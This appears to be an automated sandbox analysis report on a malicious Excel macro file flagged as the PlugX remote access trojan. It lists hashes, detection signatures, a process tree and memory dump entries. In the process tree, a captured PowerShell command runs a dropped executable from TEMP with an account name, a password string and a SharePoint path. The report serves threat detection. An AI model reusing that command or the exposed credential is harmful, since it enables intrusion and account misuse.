Analysis

  • max time kernel
    144s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    29-03-2022 23:25

General

  • Target

    b4dfa03a75594d4eb89ee173a82f976245ef874079ffa9359c748d5ee9ff5d33.xlsm

  • Size

    1.6MB

  • MD5

    81a70d33c490b0b2af21a11869c6c589

  • SHA1

    8ebd33d404e0d6dd8eeb54165527534706e0829c

  • SHA256

    b4dfa03a75594d4eb89ee173a82f976245ef874079ffa9359c748d5ee9ff5d33

  • SHA512

    204a5bbc0516cb5c5662847c5ca43d3a96919fcc2d8815b3b0bcdc6d2d30fab01b0efec2a825c164728b5e8269bc73bc740f4da82f99c3de7b0ec7d0daf397c8

Score
10/10

Malware Config

Signatures

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • PlugX Rat Payload 1 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Process spawned suspicious child process 1 IoCs

    This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Modifies registry class 2 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 15 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\b4dfa03a75594d4eb89ee173a82f976245ef874079ffa9359c748d5ee9ff5d33.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Modifies registry class
    • NTFS ADS
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1932
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1520
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -command "& ($env:TEMP + \"\SPD.exe\") \"[email protected]\" \"Nhh2H5urwHv0\" \"https://finansco.sharepoint.com/Delte dokumenter/Finansco Gruppen Fellesmappe/Modellporteføljer/\" \"Produktark MPF Kopi.xlsx\""
        2⤵
        • Process spawned unexpected child process
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1020
      • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE
        "C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE" -x -s 7012
        2⤵
        • Process spawned suspicious child process
        • Suspicious use of WriteProcessMemory
        PID:1772
        • C:\Windows\system32\dwwin.exe
          C:\Windows\system32\dwwin.exe -x -s 7012
          3⤵
          • Checks processor information in registry
          • Enumerates system info in registry
          PID:2380
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
      1⤵
        PID:4292

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/1020-164-0x000001EFCAE26000-0x000001EFCAE28000-memory.dmp

        Filesize

        8KB

      • memory/1020-163-0x000001EFCAE23000-0x000001EFCAE25000-memory.dmp

        Filesize

        8KB

      • memory/1020-162-0x000001EFCAE20000-0x000001EFCAE22000-memory.dmp

        Filesize

        8KB

      • memory/1020-161-0x00007FFC7D600000-0x00007FFC7E0C1000-memory.dmp

        Filesize

        10.8MB

      • memory/1020-160-0x000001EFCAD40000-0x000001EFCAD62000-memory.dmp

        Filesize

        136KB

      • memory/1772-175-0x00007FFC69430000-0x00007FFC69440000-memory.dmp

        Filesize

        64KB

      • memory/1772-174-0x00007FFC69430000-0x00007FFC69440000-memory.dmp

        Filesize

        64KB

      • memory/1772-173-0x00007FFC69430000-0x00007FFC69440000-memory.dmp

        Filesize

        64KB

      • memory/1772-172-0x00007FFC69430000-0x00007FFC69440000-memory.dmp

        Filesize

        64KB

      • memory/1932-140-0x0000027263A10000-0x0000027266470000-memory.dmp

        Filesize

        42.4MB

      • memory/1932-158-0x0000027248A6B000-0x0000027248A6F000-memory.dmp

        Filesize

        16KB

      • memory/1932-144-0x00000272453F0000-0x0000027245412000-memory.dmp

        Filesize

        136KB

      • memory/1932-145-0x0000027262450000-0x00000272631E0000-memory.dmp

        Filesize

        13.6MB

      • memory/1932-146-0x00000272453D0000-0x00000272453E0000-memory.dmp

        Filesize

        64KB

      • memory/1932-147-0x0000027248A80000-0x0000027248A8A000-memory.dmp

        Filesize

        40KB

      • memory/1932-148-0x0000027248A90000-0x0000027248AB2000-memory.dmp

        Filesize

        136KB

      • memory/1932-149-0x0000027248A63000-0x0000027248A65000-memory.dmp

        Filesize

        8KB

      • memory/1932-150-0x000002726A790000-0x000002726EAA6000-memory.dmp

        Filesize

        67.1MB

      • memory/1932-151-0x0000027248BE0000-0x0000027248C08000-memory.dmp

        Filesize

        160KB

      • memory/1932-152-0x0000027260CA0000-0x0000027260CF0000-memory.dmp

        Filesize

        320KB

      • memory/1932-153-0x00000272453E0000-0x00000272453F0000-memory.dmp

        Filesize

        64KB

      • memory/1932-154-0x0000027248C10000-0x0000027248C28000-memory.dmp

        Filesize

        96KB

      • memory/1932-155-0x0000027260D80000-0x0000027260DDA000-memory.dmp

        Filesize

        360KB

      • memory/1932-156-0x0000027248A66000-0x0000027248A68000-memory.dmp

        Filesize

        8KB

      • memory/1932-143-0x00000272614F0000-0x00000272616B2000-memory.dmp

        Filesize

        1.8MB

      • memory/1932-157-0x0000027248A69000-0x0000027248A6B000-memory.dmp

        Filesize

        8KB

      • memory/1932-142-0x00000272489D0000-0x0000027248A2C000-memory.dmp

        Filesize

        368KB

      • memory/1932-141-0x0000027261250000-0x00000272614E4000-memory.dmp

        Filesize

        2.6MB

      • memory/1932-130-0x00007FFC69430000-0x00007FFC69440000-memory.dmp

        Filesize

        64KB

      • memory/1932-139-0x0000027248A60000-0x0000027248A62000-memory.dmp

        Filesize

        8KB

      • memory/1932-138-0x00007FFC7D600000-0x00007FFC7E0C1000-memory.dmp

        Filesize

        10.8MB

      • memory/1932-137-0x0000027260E00000-0x0000027260FA2000-memory.dmp

        Filesize

        1.6MB

      • memory/1932-136-0x0000027246FA0000-0x0000027246FA4000-memory.dmp

        Filesize

        16KB

      • memory/1932-131-0x00007FFC69430000-0x00007FFC69440000-memory.dmp

        Filesize

        64KB

      • memory/1932-134-0x00007FFC69430000-0x00007FFC69440000-memory.dmp

        Filesize

        64KB

      • memory/1932-133-0x00007FFC69430000-0x00007FFC69440000-memory.dmp

        Filesize

        64KB

      • memory/1932-132-0x00007FFC69430000-0x00007FFC69440000-memory.dmp

        Filesize

        64KB